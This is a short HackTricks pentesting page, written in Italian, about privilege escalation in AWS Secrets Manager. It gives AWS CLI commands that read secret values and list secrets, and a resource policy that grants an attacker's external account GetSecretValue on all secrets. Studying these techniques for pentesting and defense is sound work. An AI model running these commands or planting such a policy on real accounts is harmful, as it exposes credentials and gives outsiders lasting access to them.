AWS - Secrets Manager Privesc

Support HackTricks

Secrets Manager

Per ulteriori informazioni su Secrets Manager, controlla:

secretsmanager:GetSecretValue

Un attaccante con questo permesso può ottenere il valore salvato all'interno di un segreto in AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Impatto Potenziale: Accesso a dati altamente sensibili all'interno del servizio AWS secrets manager.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Con i permessi precedenti è possibile dare accesso ad altri principali/account (anche esterni) per accedere al segreto. Nota che per leggere segreti crittografati con una chiave KMS, l'utente deve anche avere accesso sulla chiave KMS (maggiori informazioni nella pagina KMS Enum).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}
Supporta HackTricks

Last updated